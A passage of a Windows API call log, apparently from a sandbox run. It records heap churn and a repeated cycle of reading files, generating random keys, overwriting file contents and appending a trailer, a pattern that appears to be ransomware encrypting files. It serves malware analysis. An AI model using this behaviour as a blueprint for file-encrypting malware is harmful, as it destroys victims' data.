[0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 [0077.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.932] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.933] GetProcessHeap () returned 0x280000 [0077.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.934] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.934] WriteFile (in: hFile=0x824, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.934] WriteFile (in: hFile=0x824, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.934] GetProcessHeap () returned 0x280000 [0077.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.934] CloseHandle (hObject=0x824) returned 1 [0077.934] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 39 [0077.935] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.935] ReadFile (in: hFile=0x80c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.935] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.935] GetProcessHeap () returned 0x280000 [0077.935] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.935] GetProcessHeap () returned 0x280000 [0077.935] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.935] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.935] GetProcessHeap () returned 0x280000 [0077.935] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.935] ReadFile (in: hFile=0x80c, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x496, lpOverlapped=0x0) returned 1 [0077.954] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.954] WriteFile (in: hFile=0x80c, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x496, lpOverlapped=0x0) returned 1 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.955] GetProcessHeap () returned 0x280000 [0077.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.956] GetProcessHeap () returned 0x280000 [0077.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.956] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.957] GetProcessHeap () returned 0x280000 [0077.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.958] GetProcessHeap () returned 0x280000 [0077.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.959] GetProcessHeap () returned 0x280000 [0077.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.959] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.959] WriteFile (in: hFile=0x80c, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.959] WriteFile (in: hFile=0x80c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.960] GetProcessHeap () returned 0x280000 [0077.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.960] GetProcessHeap () returned 0x280000 [0077.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.960] GetProcessHeap () returned 0x280000 [0077.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.960] CloseHandle (hObject=0x80c) returned 1 [0077.961] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 40 [0077.962] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.963] ReadFile (in: hFile=0x82c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.963] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.963] GetProcessHeap () returned 0x280000 [0077.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.963] GetProcessHeap () returned 0x280000 [0077.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.963] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.963] GetProcessHeap () returned 0x280000 [0077.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.963] ReadFile (in: hFile=0x82c, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.014] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.014] WriteFile (in: hFile=0x82c, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.014] GetProcessHeap () returned 0x280000 [0078.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 